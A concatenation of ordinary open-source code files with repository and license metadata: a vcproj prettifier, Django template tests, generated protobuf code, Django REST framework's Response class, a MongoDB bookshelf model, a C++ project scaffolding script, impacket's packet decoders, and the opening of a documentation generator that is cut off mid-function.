def FixFilenames(filenames, current_directory):
  """Return cleaned-up versions of |filenames| resolved against
  |current_directory|; empty entries are dropped and '$'-prefixed macros are
  kept as-is."""
  # Relative paths are resolved against the project's directory; chdir once
  # instead of once per filename (the call was loop-invariant).
  os.chdir(current_directory)
  new_list = []
  for filename in filenames:
    if not filename:
      continue
    # Apply the command-line replacement map first.
    for key in REPLACEMENTS:
      filename = filename.replace(key, REPLACEMENTS[key])
    filename = filename.strip('"\' ')
    if filename.startswith('$'):
      # Leave MSBuild-style macros untouched.
      new_list.append(filename)
    else:
      new_list.append(os.path.abspath(filename))
  return new_list
def AbsoluteNode(node):
  """Makes all the properties we know about in this node absolute."""
  if node.attributes:
    for (name, value) in node.attributes.items():
      if name in ['InheritedPropertySheets', 'RelativePath',
                  'AdditionalIncludeDirectories',
                  'IntermediateDirectory', 'OutputDirectory',
                  'AdditionalLibraryDirectories']:
        # We want to fix up these paths
        path_list = value.split(';')
        new_list = FixFilenames(path_list, os.path.dirname(ARGUMENTS[1]))
        node.setAttribute(name, ';'.join(new_list))
      if not value:
        # Drop attributes that were empty to begin with.
        node.removeAttribute(name)
def CleanupVcproj(node):
  """For each sub node, we call recursively this function.

  Normalizes whitespace, sorts and de-dups semicolon-separated attributes,
  flattens filters, and re-inserts children in a canonical sorted order.
  """
  for sub_node in node.childNodes:
    AbsoluteNode(sub_node)
    CleanupVcproj(sub_node)

  # Normalize the node, and remove all extranous whitespaces.
  for sub_node in node.childNodes:
    if sub_node.nodeType == Node.TEXT_NODE:
      sub_node.data = sub_node.data.replace("\r", "")
      sub_node.data = sub_node.data.replace("\n", "")
      sub_node.data = sub_node.data.rstrip()

  # Fix all the semicolon separated attributes to be sorted, and we also
  # remove the dups.
  if node.attributes:
    for (name, value) in node.attributes.items():
      sorted_list = sorted(value.split(';'))
      unique_list = []
      for i in sorted_list:
        if not unique_list.count(i):
          unique_list.append(i)
      node.setAttribute(name, ';'.join(unique_list))
      if not value:
        node.removeAttribute(name)

  if node.childNodes:
    node.normalize()

  # For each node, take a copy, and remove it from the list.
  node_array = []
  while node.childNodes and node.childNodes[0]:
    # Take a copy of the node and remove it from the list.
    current = node.childNodes[0]
    node.removeChild(current)

    # If the child is a filter, we want to append all its children
    # to this same list.
    if current.nodeName == 'Filter':
      node_array.extend(FlattenFilter(current))
    else:
      node_array.append(current)

  # Sort the list.
  node_array.sort(CmpNode())

  # Insert the nodes in the correct order.
  for new_node in node_array:
    # But don't append empty tool node.
    if new_node.nodeName == 'Tool':
      if new_node.attributes and new_node.attributes.length == 1:
        # This one was empty.
        continue
    if new_node.nodeName == 'UserMacro':
      continue
    node.appendChild(new_node)
def GetConfiguationNodes(vcproj):
  """Return every <Configuration> element found under <Configurations>.

  (TODO from upstream: find a better way to navigate the xml.)
  """
  found = []
  for child in vcproj.childNodes:
    if child.nodeName != "Configurations":
      continue
    for candidate in child.childNodes:
      if candidate.nodeName == "Configuration":
        found.append(candidate)
  return found
def GetChildrenVsprops(filename):
  """Return absolute paths of the property sheets inherited by `filename`.

  Parses the vsprops file and resolves its 'InheritedPropertySheets'
  attribute relative to the file's own directory.  Returns [] when the
  root element carries no attributes at all.
  """
  dom = parse(filename)
  root = dom.documentElement
  if not root.attributes:
    return []
  inherited = root.getAttribute('InheritedPropertySheets')
  return FixFilenames(inherited.split(';'), os.path.dirname(filename))
def SeekToNode(node1, child2):
  """Locate, among node1's children, the element that matches child2.

  A match is a child with the same tag name and the same "Name"
  attribute.  Returns None when child2 is a text node, carries no
  "Name" (nothing reliable to pair on), or has no counterpart.
  """
  # A text node does not have properties, so it can never be matched.
  if child2.nodeType == Node.TEXT_NODE:
    return None

  wanted_name = child2.getAttribute("Name")
  if not wanted_name:
    # There is no name. We don't know how to merge.
    return None

  # Scan node1's children for the same tag/name combination.
  for candidate in node1.childNodes:
    if (candidate.nodeName == child2.nodeName and
        candidate.getAttribute("Name") == wanted_name):
      return candidate

  # No match. We give up.
  return None
def MergeAttributes(node1, node2):
  """Fold node2's attributes into node1.

  The 'Name' attribute is left untouched.  When both nodes define the
  same attribute with different values, the two values are joined with
  ';'.  'InheritedPropertySheets' is stripped from node1 afterwards,
  since the sheets have already been expanded by the caller.
  """
  # Nothing to merge?
  if not node2.attributes:
    return

  for attr_name, incoming in node2.attributes.items():
    if attr_name == 'Name':
      # Merging names would corrupt the configuration identity.
      continue
    existing = node1.getAttribute(attr_name)
    if not existing:
      # Absent on the main node: just copy the incoming value.
      node1.setAttribute(attr_name, incoming)
    elif existing != incoming:
      # Present with a different value: concatenate the two.
      node1.setAttribute(attr_name, ';'.join([existing, incoming]))
    # Property sheet references are useless once merged; drop them.
    if attr_name == 'InheritedPropertySheets':
      node1.removeAttribute(attr_name)
def MergeProperties(node1, node2):
  """Recursively merge node2 (a property-sheet subtree) into node1."""
  MergeAttributes(node1, node2)
  for incoming_child in node2.childNodes:
    match = SeekToNode(node1, incoming_child)
    if match is None:
      # No counterpart in node1: graft a deep copy of the subtree.
      node1.appendChild(incoming_child.cloneNode(True))
    else:
      MergeProperties(match, incoming_child)
def main(argv):
  """Main function of this vcproj prettifier.

  argv[1] is the vcproj to pretty-print; any further arguments are
  key=value pairs stored in the global REPLACEMENTS map (consumed by
  helpers defined elsewhere in this file).  Returns a process exit code.
  """
  global ARGUMENTS
  ARGUMENTS = argv
  # check if we have exactly 1 parameter.
  if len(argv) < 2:
    print ('Usage: %s "c:\\path\\to\\vcproj.vcproj" [key1=value1] '
           '[key2=value2]' % argv[0])
    return 1

  # Parse the keys
  for i in range(2, len(argv)):
    (key, value) = argv[i].split('=')
    REPLACEMENTS[key] = value

  # Open the vcproj and parse the xml.
  dom = parse(argv[1])

  # First thing we need to do is find the Configuration Node and merge them
  # with the vsprops they include.
  for configuration_node in GetConfiguationNodes(dom.documentElement):
    # Get the property sheets associated with this configuration.
    vsprops = configuration_node.getAttribute('InheritedPropertySheets')

    # Fix the filenames to be absolute.
    vsprops_list = FixFilenames(vsprops.strip().split(';'),
                                os.path.dirname(argv[1]))

    # Extend the list of vsprops with all vsprops contained in the current
    # vsprops.  NOTE: the list is deliberately extended while being
    # iterated, so transitively included sheets get visited too.
    for current_vsprops in vsprops_list:
      vsprops_list.extend(GetChildrenVsprops(current_vsprops))

    # Now that we have all the vsprops, we need to merge them.
    for current_vsprops in vsprops_list:
      MergeProperties(configuration_node,
                      parse(current_vsprops).documentElement)

  # Now that everything is merged, we need to cleanup the xml.
  CleanupVcproj(dom.documentElement)

  # Finally, we use the pretty xml function to print the vcproj back to
  # the user.
  #print dom.toprettyxml(newl="\n")
  PrettyPrintNode(dom.documentElement)
  return 0

if __name__ == '__main__':
  sys.exit(main(sys.argv))
| apache-2.0 |
bikong2/django | tests/template_tests/syntax_tests/test_invalid_string.py | 440 | 2310 | from django.test import SimpleTestCase
from ..utils import setup
class InvalidStringTests(SimpleTestCase):
    """How template rendering handles unresolvable ("invalid") variables.

    Every template references the undefined variable ``var``.  Expected
    output depends on whether the engine was configured with
    ``string_if_invalid``.

    NOTE(review): ``self.engine`` is injected by the ``@setup`` decorator
    imported from ``..utils`` -- not visible in this file; confirm there.
    """
    libraries = {'i18n': 'django.templatetags.i18n'}

    @setup({'invalidstr01': '{{ var|default:"Foo" }}'})
    def test_invalidstr01(self):
        # With string_if_invalid configured, it wins over |default.
        output = self.engine.render_to_string('invalidstr01')
        if self.engine.string_if_invalid:
            self.assertEqual(output, 'INVALID')
        else:
            self.assertEqual(output, 'Foo')

    @setup({'invalidstr02': '{{ var|default_if_none:"Foo" }}'})
    def test_invalidstr02(self):
        # An invalid variable is not None, so default_if_none never fires.
        output = self.engine.render_to_string('invalidstr02')
        if self.engine.string_if_invalid:
            self.assertEqual(output, 'INVALID')
        else:
            self.assertEqual(output, '')

    @setup({'invalidstr03': '{% for v in var %}({{ v }}){% endfor %}'})
    def test_invalidstr03(self):
        # Iterating an invalid variable yields nothing.
        output = self.engine.render_to_string('invalidstr03')
        self.assertEqual(output, '')

    @setup({'invalidstr04': '{% if var %}Yes{% else %}No{% endif %}'})
    def test_invalidstr04(self):
        # An invalid variable is falsy in {% if %}.
        output = self.engine.render_to_string('invalidstr04')
        self.assertEqual(output, 'No')

    @setup({'invalidstr04_2': '{% if var|default:"Foo" %}Yes{% else %}No{% endif %}'})
    def test_invalidstr04_2(self):
        # Inside {% if %} the |default filter does apply.
        output = self.engine.render_to_string('invalidstr04_2')
        self.assertEqual(output, 'Yes')

    @setup({'invalidstr05': '{{ var }}'})
    def test_invalidstr05(self):
        output = self.engine.render_to_string('invalidstr05')
        if self.engine.string_if_invalid:
            self.assertEqual(output, 'INVALID')
        else:
            self.assertEqual(output, '')

    @setup({'invalidstr06': '{{ var.prop }}'})
    def test_invalidstr06(self):
        # Attribute lookup on an invalid variable behaves the same way.
        output = self.engine.render_to_string('invalidstr06')
        if self.engine.string_if_invalid:
            self.assertEqual(output, 'INVALID')
        else:
            self.assertEqual(output, '')

    @setup({'invalidstr07': '{% load i18n %}{% blocktrans %}{{ var }}{% endblocktrans %}'})
    def test_invalidstr07(self):
        # Same behavior inside a translated block.
        output = self.engine.render_to_string('invalidstr07')
        if self.engine.string_if_invalid:
            self.assertEqual(output, 'INVALID')
        else:
            self.assertEqual(output, '')
| bsd-3-clause |
unnikrishnankgs/va | venv/lib/python3.5/site-packages/google/protobuf/internal/more_messages_pb2.py | 4 | 4177 | # Generated by the protocol buffer compiler. DO NOT EDIT!
# source: google/protobuf/internal/more_messages.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
# NOTE(review): this module is emitted by protoc ("DO NOT EDIT" header
# above) -- any hand-written comment here is lost on regeneration.  It
# describes message OutOfOrderFields (fields declared out of tag order)
# plus two file-level extensions of it.
DESCRIPTOR = _descriptor.FileDescriptor(
  name='google/protobuf/internal/more_messages.proto',
  package='google.protobuf.internal',
  syntax='proto2',
  serialized_pb=_b('\n,google/protobuf/internal/more_messages.proto\x12\x18google.protobuf.internal\"h\n\x10OutOfOrderFields\x12\x17\n\x0foptional_sint32\x18\x05 \x01(\x11\x12\x17\n\x0foptional_uint32\x18\x03 \x01(\r\x12\x16\n\x0eoptional_int32\x18\x01 \x01(\x05*\x04\x08\x04\x10\x05*\x04\x08\x02\x10\x03:C\n\x0foptional_uint64\x12*.google.protobuf.internal.OutOfOrderFields\x18\x04 \x01(\x04:B\n\x0eoptional_int64\x12*.google.protobuf.internal.OutOfOrderFields\x18\x02 \x01(\x03')
)

# File-level extension: optional_uint64 occupies field number 4.
OPTIONAL_UINT64_FIELD_NUMBER = 4
optional_uint64 = _descriptor.FieldDescriptor(
  name='optional_uint64', full_name='google.protobuf.internal.optional_uint64', index=0,
  number=4, type=4, cpp_type=4, label=1,
  has_default_value=False, default_value=0,
  message_type=None, enum_type=None, containing_type=None,
  is_extension=True, extension_scope=None,
  options=None)
# File-level extension: optional_int64 occupies field number 2.
OPTIONAL_INT64_FIELD_NUMBER = 2
optional_int64 = _descriptor.FieldDescriptor(
  name='optional_int64', full_name='google.protobuf.internal.optional_int64', index=1,
  number=2, type=3, cpp_type=2, label=1,
  has_default_value=False, default_value=0,
  message_type=None, enum_type=None, containing_type=None,
  is_extension=True, extension_scope=None,
  options=None)

# Message descriptor; extension_ranges reserve tags 4 and 2 for the
# extensions declared above.
_OUTOFORDERFIELDS = _descriptor.Descriptor(
  name='OutOfOrderFields',
  full_name='google.protobuf.internal.OutOfOrderFields',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  fields=[
    _descriptor.FieldDescriptor(
      name='optional_sint32', full_name='google.protobuf.internal.OutOfOrderFields.optional_sint32', index=0,
      number=5, type=17, cpp_type=1, label=1,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='optional_uint32', full_name='google.protobuf.internal.OutOfOrderFields.optional_uint32', index=1,
      number=3, type=13, cpp_type=3, label=1,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='optional_int32', full_name='google.protobuf.internal.OutOfOrderFields.optional_int32', index=2,
      number=1, type=5, cpp_type=1, label=1,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  options=None,
  is_extendable=True,
  syntax='proto2',
  extension_ranges=[(4, 5), (2, 3), ],
  oneofs=[
  ],
  serialized_start=74,
  serialized_end=178,
)

DESCRIPTOR.message_types_by_name['OutOfOrderFields'] = _OUTOFORDERFIELDS
DESCRIPTOR.extensions_by_name['optional_uint64'] = optional_uint64
DESCRIPTOR.extensions_by_name['optional_int64'] = optional_int64
_sym_db.RegisterFileDescriptor(DESCRIPTOR)

# Build the concrete message class from the descriptor and register it.
OutOfOrderFields = _reflection.GeneratedProtocolMessageType('OutOfOrderFields', (_message.Message,), dict(
  DESCRIPTOR = _OUTOFORDERFIELDS,
  __module__ = 'google.protobuf.internal.more_messages_pb2'
  # @@protoc_insertion_point(class_scope:google.protobuf.internal.OutOfOrderFields)
  ))
_sym_db.RegisterMessage(OutOfOrderFields)

OutOfOrderFields.RegisterExtension(optional_uint64)
OutOfOrderFields.RegisterExtension(optional_int64)

# @@protoc_insertion_point(module_scope)
| bsd-2-clause |
rense/django-rest-framework | rest_framework/response.py | 17 | 3615 | """
The Response class in REST framework is similar to HTTPResponse, except that
it is initialized with unrendered data, instead of a pre-rendered string.
The appropriate renderer is called during Django's template response rendering.
"""
from __future__ import unicode_literals
from django.template.response import SimpleTemplateResponse
from django.utils import six
from django.utils.six.moves.http_client import responses
from rest_framework.serializers import Serializer
class Response(SimpleTemplateResponse):
    """
    An HttpResponse that allows its data to be rendered into
    arbitrary media types.
    """

    def __init__(self, data=None, status=None,
                 template_name=None, headers=None,
                 exception=False, content_type=None):
        """
        Alters the init arguments slightly.
        For example, drop 'template_name', and instead use 'data'.

        Setting 'renderer' and 'media_type' will typically be deferred,
        For example being set automatically by the `APIView`.
        """
        super(Response, self).__init__(None, status=status)

        # Guard against a common mistake: passing the serializer itself
        # instead of its .data / .errors representation.
        if isinstance(data, Serializer):
            msg = (
                'You passed a Serializer instance as data, but '
                'probably meant to pass serialized `.data` or '
                '`.error`. representation.'
            )
            raise AssertionError(msg)

        self.data = data
        self.template_name = template_name
        self.exception = exception
        self.content_type = content_type

        if headers:
            for name, value in six.iteritems(headers):
                self[name] = value

    @property
    def rendered_content(self):
        """Render self.data with the negotiated renderer; returns bytes
        (or whatever non-text value the renderer produced)."""
        renderer = getattr(self, 'accepted_renderer', None)
        media_type = getattr(self, 'accepted_media_type', None)
        context = getattr(self, 'renderer_context', None)

        # These three are normally attached by APIView.finalize_response.
        assert renderer, ".accepted_renderer not set on Response"
        assert media_type, ".accepted_media_type not set on Response"
        assert context, ".renderer_context not set on Response"
        context['response'] = self

        charset = renderer.charset
        content_type = self.content_type

        # Derive the Content-Type header when not set explicitly, adding
        # the charset parameter only if the renderer declares one.
        if content_type is None and charset is not None:
            content_type = "{0}; charset={1}".format(media_type, charset)
        elif content_type is None:
            content_type = media_type
        self['Content-Type'] = content_type

        ret = renderer.render(self.data, media_type, context)
        if isinstance(ret, six.text_type):
            # Text output must be encodable; a renderer that returns
            # unicode without a charset is a configuration error.
            assert charset, (
                'renderer returned unicode, and did not specify '
                'a charset value.'
            )
            return bytes(ret.encode(charset))

        if not ret:
            # An empty body gets no Content-Type header at all.
            del self['Content-Type']

        return ret

    @property
    def status_text(self):
        """
        Returns reason text corresponding to our HTTP response status code.
        Provided for convenience.
        """
        # TODO: Deprecate and use a template tag instead
        # TODO: Status code text for RFC 6585 status codes
        return responses.get(self.status_code, '')

    def __getstate__(self):
        """
        Remove attributes from the response that shouldn't be cached.
        """
        state = super(Response, self).__getstate__()
        # These hold request/renderer machinery that is neither picklable
        # nor meaningful once the response is cached.
        for key in (
            'accepted_renderer', 'renderer_context', 'resolver_match',
            'client', 'request', 'json', 'wsgi_request'
        ):
            if key in state:
                del state[key]
        state['_closable_objects'] = []
        return state
| bsd-2-clause |
kawasaki2013/getting-started-python | 7-gce/bookshelf/model_mongodb.py | 9 | 2036 | # Copyright 2015 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from bson.objectid import ObjectId
from flask.ext.pymongo import PyMongo
builtin_list = list
mongo = PyMongo()
def _id(id):
    """Coerce `id` into a bson ObjectId; already-converted values pass through."""
    return id if isinstance(id, ObjectId) else ObjectId(id)
def from_mongo(data):
    """
    Translates the MongoDB dictionary format into the format that's expected
    by the application: the '_id' value is mirrored as a string under 'id'.

    Returns None for a missing/empty document.  Note: mutates and returns
    `data` itself rather than copying it.
    """
    if data:
        data['id'] = str(data['_id'])
        return data
    return None
def init_app(app):
    # Bind the module-level PyMongo instance to the Flask application.
    mongo.init_app(app)
def list(limit=10, cursor=None):
    """Return one page of books ordered by title.

    Args:
        limit: maximum number of books per page.
        cursor: opaque offset (stringified int) from a previous call, or
            None/falsy for the first page.

    Returns:
        ``(books, next_page)`` where ``next_page`` is the cursor for the
        following page, or None when this page was not full.
    """
    cursor = int(cursor) if cursor else 0
    # Bug fix: the query previously hard-coded limit=10, silently
    # ignoring the caller-supplied ``limit`` argument.
    results = mongo.db.books.find(skip=cursor, limit=limit).sort('title')
    books = builtin_list(map(from_mongo, results))
    next_page = cursor + limit if len(books) == limit else None
    return (books, next_page)
def list_by_user(user_id, limit=10, cursor=None):
    """Return one page of books created by ``user_id``, ordered by title.

    Args:
        user_id: value matched against the ``createdById`` field.
        limit: maximum number of books per page.
        cursor: opaque offset (stringified int) from a previous call, or
            None/falsy for the first page.

    Returns:
        ``(books, next_page)`` where ``next_page`` is the cursor for the
        following page, or None when this page was not full.
    """
    cursor = int(cursor) if cursor else 0
    # Bug fix: the query previously hard-coded limit=10, silently
    # ignoring the caller-supplied ``limit`` argument.
    results = mongo.db.books\
        .find({'createdById': user_id}, skip=cursor, limit=limit)\
        .sort('title')
    books = builtin_list(map(from_mongo, results))
    next_page = cursor + limit if len(books) == limit else None
    return (books, next_page)
def read(id):
    # Fetch a single book by id; returns None when it does not exist.
    result = mongo.db.books.find_one(_id(id))
    return from_mongo(result)


def create(data):
    # Insert a new book document, then return it in application format.
    new_id = mongo.db.books.insert(data)
    return read(new_id)


def update(data, id):
    # Replace the stored document with `data` and return the fresh copy.
    mongo.db.books.update({'_id': _id(id)}, data)
    return read(id)


def delete(id):
    # Remove the book with the given id.
    mongo.db.books.remove(_id(id))
| apache-2.0 |
bailey-lab/SeekDeep | scripts/cppProjectScripts/inProgress/createNewBibseqRing.py | 8 | 3286 | #!/usr/bin/env python2
import shutil, os, argparse, sys, stat,time
def parse_args():
    """Parse the mandatory -name, -author and -prepath command line flags."""
    parser = argparse.ArgumentParser()
    for flag in ('-name', '-author', '-prepath'):
        parser.add_argument(flag, type=str, required=True)
    return parser.parse_args()
def fileInfoHeader(headerName, author):
    """Render the standard copyright banner placed at the top of a file."""
    stamp = {
        'headerName': headerName,
        'author': author,
        'year': time.strftime("%Y"),
        'date': time.strftime("%Y/%m/%d"),
    }
    return """
// {headerName}
//
//  Created by {author} on {date}.
//  Copyright (c) {year} {author}. All rights reserved.
//
""".format(**stamp)
def startHeader(headerName, author):
    """Header-file preamble: '#pragma once' guard followed by the banner."""
    guard = """#pragma once
//
"""
    return guard + fileInfoHeader(headerName, author)
def startCpp(nameStub, author):
    """Source-file preamble: banner plus an #include of the matching header."""
    banner = fileInfoHeader(nameStub + ".cpp", author)
    include = """
#include "{name}.hpp"
""".format(name=nameStub)
    return banner + include
def main():
    """Scaffold a new '<name>' command ring: a directory with SetUp and
    Runner hpp/cpp skeletons, plus a top-level <name>.h umbrella header.

    NOTE(review): Python 2 script (print statement below); the generated
    C++ uses the njhseq/njhcpp libraries.
    """
    args = parse_args()
    name = args.name
    prepath = args.prepath
    if not prepath.endswith("/"):
        prepath += "/"
    # Refuse to clobber an existing ring.
    if os.path.exists(name) or os.path.exists(name + ".h"):
        print "Error, " + name + " already exists"
        exit(1)
    #create main dir
    os.mkdir(name)
    #create main header to include the ring
    with open(name + ".h", "w") as f:
        mainHeaderOut = startHeader( name + ".h", args.author) + """
#include "{prepath}{name}/{name}SetUp.hpp"
#include "{prepath}{name}/{name}Runner.hpp"
""".format(name=args.name,prepath = prepath)
        f.write(mainHeaderOut)
    #create setUp header
    with open(os.path.join(name,name + "SetUp.hpp"), "w") as f:
        defaultHeader = startHeader(name + "SetUp.hpp", args.author)
        # Doubled braces below are literal braces in the generated C++.
        defaultHeader += """
#include <njhseq.h>
#include <njhseq/programUtils/seqSetUp.hpp>
#include <njhcpp.h>

namespace njhseq {{

class {name}SetUp : public seqSetUp {{
public:
using seqSetUp::seqSetUp;
}};
}} // namespace njhseq
""".format(name =name)
        f.write(defaultHeader)
    #create setUp cpp
    with open(os.path.join(name,name + "SetUp.cpp"), "w") as f:
        infoHeader = startCpp(name + "SetUp", args.author)
        infoHeader +="""
namespace njhseq {
} // namespace njhseq
"""
        f.write(infoHeader)
    #create runner header
    with open(os.path.join(name,name + "Runner.hpp"), "w") as f:
        infoHeader = startHeader(name + "Runner.hpp", args.author)
        infoHeader +="""
#include "{name}SetUp.hpp"

namespace njhseq {{

class {name}Runner : public njh::progutils::programRunner {{
public:
{name}Runner();

static int placeHolder(MapStrStr inputCommands);

}};
}} // namespace njhseq
""".format(name = name)
        f.write(infoHeader)
    #create runner cpp
    with open(os.path.join(name,name + "Runner.cpp"), "w") as f:
        infoHeader = startCpp(name + "Runner", args.author)
        infoHeader +="""
namespace njhseq {{

{name}Runner::{name}Runner()
: njh::progutils::programRunner({{addFunc("placeHolder", placeHolder, false)}},
"{name}") {{}}

int {name}Runner::placeHolder(MapStrStr inputCommands) {{
{name}SetUp setUp(inputCommands);
setUp.finishSetUp(std::cout);
return 0;
}}

}} // namespace njhseq
""".format(name = name)
        f.write(infoHeader)

# Runs on import as well as direct execution (no __main__ guard upstream).
main()
badreddinetahir/pwn_plug_sources | src/voiper/sulley/impacket/ImpactDecoder.py | 8 | 5509 | # Copyright (c) 2003-2006 CORE Security Technologies
#
# This software is provided under under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# $Id: ImpactDecoder.py,v 1.6 2006/05/23 22:25:34 gera Exp $
#
# Description:
# Convenience packet unpackers for various network protocols
# implemented in the ImpactPacket module.
#
# Author:
# Javier Burroni (javier)
# Bruce Leidl (brl)
import ImpactPacket
"""Classes to convert from raw packets into a hierarchy of
ImpactPacket derived objects.
The protocol of the outermost layer must be known in advance, and the
packet must be fed to the corresponding decoder. From there it will
try to decode the raw data into a hierarchy of ImpactPacket derived
objects; if a layer's protocol is unknown, all the remaining data will
be wrapped into a ImpactPacket.Data object.
"""
class Decoder:
    """Abstract base for the protocol decoders in this module.

    Subclasses override decode() to turn a raw byte buffer into a chain
    of ImpactPacket objects.
    """
    def decode(self, aBuffer):
        # Intentionally a no-op; concrete decoders implement this.
        pass
class EthDecoder(Decoder):
    """Decodes an Ethernet frame and dispatches its payload by EtherType."""

    def __init__(self):
        pass

    def decode(self, aBuffer):
        frame = ImpactPacket.Ethernet(aBuffer)
        payload = aBuffer[frame.get_header_size():]
        ether_type = frame.get_ether_type()
        if ether_type == ImpactPacket.IP.ethertype:
            self.ip_decoder = IPDecoder()
            inner = self.ip_decoder.decode(payload)
        elif ether_type == ImpactPacket.ARP.ethertype:
            self.arp_decoder = ARPDecoder()
            inner = self.arp_decoder.decode(payload)
        else:
            # Unknown EtherType: keep the payload as opaque data.
            self.data_decoder = DataDecoder()
            inner = self.data_decoder.decode(payload)
        frame.contains(inner)
        return frame
# Linux "cooked" capture encapsulation.
# Used, for instance, for packets returned by the "any" interface.
class LinuxSLLDecoder(Decoder):
    """Decodes the Linux SLL ("cooked") capture header and dispatches
    the payload by EtherType, like EthDecoder."""
    def __init__(self):
        pass

    def decode(self, aBuffer):
        e = ImpactPacket.LinuxSLL(aBuffer)
        # The SLL header is a fixed 16 bytes; the offset is hard-coded
        # rather than queried from the header object.
        off = 16
        if e.get_ether_type() == ImpactPacket.IP.ethertype:
            self.ip_decoder = IPDecoder()
            packet = self.ip_decoder.decode(aBuffer[off:])
        elif e.get_ether_type() == ImpactPacket.ARP.ethertype:
            self.arp_decoder = ARPDecoder()
            packet = self.arp_decoder.decode(aBuffer[off:])
        else:
            # Unknown EtherType: keep the payload as opaque data.
            self.data_decoder = DataDecoder()
            packet = self.data_decoder.decode(aBuffer[off:])
        e.contains(packet)
        return e
class IPDecoder(Decoder):
    """Decodes an IPv4 datagram and dispatches its payload by protocol number."""

    def __init__(self):
        pass

    def decode(self, aBuffer):
        datagram = ImpactPacket.IP(aBuffer)
        payload = aBuffer[datagram.get_header_size():]
        proto = datagram.get_ip_p()
        if proto == ImpactPacket.UDP.protocol:
            self.udp_decoder = UDPDecoder()
            inner = self.udp_decoder.decode(payload)
        elif proto == ImpactPacket.TCP.protocol:
            self.tcp_decoder = TCPDecoder()
            inner = self.tcp_decoder.decode(payload)
        elif proto == ImpactPacket.ICMP.protocol:
            self.icmp_decoder = ICMPDecoder()
            inner = self.icmp_decoder.decode(payload)
        else:
            # Unrecognized protocol: keep the payload as opaque data.
            self.data_decoder = DataDecoder()
            inner = self.data_decoder.decode(payload)
        datagram.contains(inner)
        return datagram
class ARPDecoder(Decoder):
    """Decodes an ARP header; anything following it is kept as raw data."""

    def __init__(self):
        pass

    def decode(self, aBuffer):
        arp = ImpactPacket.ARP(aBuffer)
        self.data_decoder = DataDecoder()
        trailing = self.data_decoder.decode(aBuffer[arp.get_header_size():])
        arp.contains(trailing)
        return arp
class UDPDecoder(Decoder):
    """Decodes a UDP header; the payload is wrapped as raw data."""
    def __init__(self):
        pass

    def decode(self, aBuffer):
        u = ImpactPacket.UDP(aBuffer)
        off = u.get_header_size()
        self.data_decoder = DataDecoder()
        packet = self.data_decoder.decode(aBuffer[off:])
        u.contains(packet)
        return u
class TCPDecoder(Decoder):
    """Decodes a TCP header; the payload is wrapped as raw data."""
    def __init__(self):
        pass

    def decode(self, aBuffer):
        t = ImpactPacket.TCP(aBuffer)
        off = t.get_header_size()
        self.data_decoder = DataDecoder()
        packet = self.data_decoder.decode(aBuffer[off:])
        t.contains(packet)
        return t
class IPDecoderForICMP(Decoder):
    """This class was added to parse the IP header of ICMP unreachables packets
    If you use the "standard" IPDecoder, it might crash (see bug #4870) ImpactPacket.py
    because the TCP header inside the IP header is incomplete"""
    def __init__(self):
        pass

    def decode(self, aBuffer):
        i = ImpactPacket.IP(aBuffer)
        off = i.get_header_size()
        # Unlike IPDecoder, only UDP is decoded further; TCP/ICMP inner
        # headers may be truncated in an unreachable quote, so everything
        # else is kept as raw data.
        if i.get_ip_p() == ImpactPacket.UDP.protocol:
            self.udp_decoder = UDPDecoder()
            packet = self.udp_decoder.decode(aBuffer[off:])
        else:
            self.data_decoder = DataDecoder()
            packet = self.data_decoder.decode(aBuffer[off:])
        i.contains(packet)
        return i
class ICMPDecoder(Decoder):
    """Decodes an ICMP header; unreachable messages get their quoted IP
    header parsed with the truncation-tolerant IPDecoderForICMP."""
    def __init__(self):
        pass

    def decode(self, aBuffer):
        ic = ImpactPacket.ICMP(aBuffer)
        off = ic.get_header_size()
        if ic.get_icmp_type() == ImpactPacket.ICMP.ICMP_UNREACH:
            # Destination-unreachable quotes the offending IP packet.
            self.ip_decoder = IPDecoderForICMP()
            packet = self.ip_decoder.decode(aBuffer[off:])
        else:
            self.data_decoder = DataDecoder()
            packet = self.data_decoder.decode(aBuffer[off:])
        ic.contains(packet)
        return ic
class DataDecoder(Decoder):
    """Terminal decoder: wraps whatever bytes remain as an opaque Data blob."""
    def decode(self, aBuffer):
        return ImpactPacket.Data(aBuffer)
| gpl-3.0 |
Kulmerov/Cinnamon | docs/reference/cinnamon-js/gen_lib.py | 14 | 26798 | # coding: utf-8
# Dear future self,
#
# You're looking at this file because
# the parse function finally broke.
#
# It's not fixable. You have to rewrite it.
# Sincerely, past self
#
# Also, it's probably at least
# 2013. Did you ever take
# that trip to Iceland?
import re
def get_type_link(typ, file):
    """Map a documented type name to the docbook link id it should use.

    Resolution order: exact match in the global object registry, then a
    file-qualified match, then the same two lookups with a trailing 's'
    stripped (naive plural), then Gio/GLib names rewritten to their
    gtk-doc 'G'-prefixed ids, and finally the name itself with dots
    removed.  An empty name documents a void return.
    """
    from gen_doc import objects

    if typ == '':
        return "void"
    else:
        if typ in objects:
            return "cinnamon-js-" + objects[typ].prefix
        elif file.name + "." + typ in objects:
            return "cinnamon-js-" + objects[file.name + "." + typ].prefix
        elif typ.endswith("s") and typ[:-1] in objects:
            return "cinnamon-js-" + objects[typ[:-1]].prefix
        elif typ.endswith("s") and file.name + "." + typ[:-1] in objects:
            return "cinnamon-js-" + objects[file.name + "." + typ[:-1]].prefix
        elif typ.startswith("Gio"):
            return typ.replace("Gio.", "G")
        elif typ.startswith("GLib"):
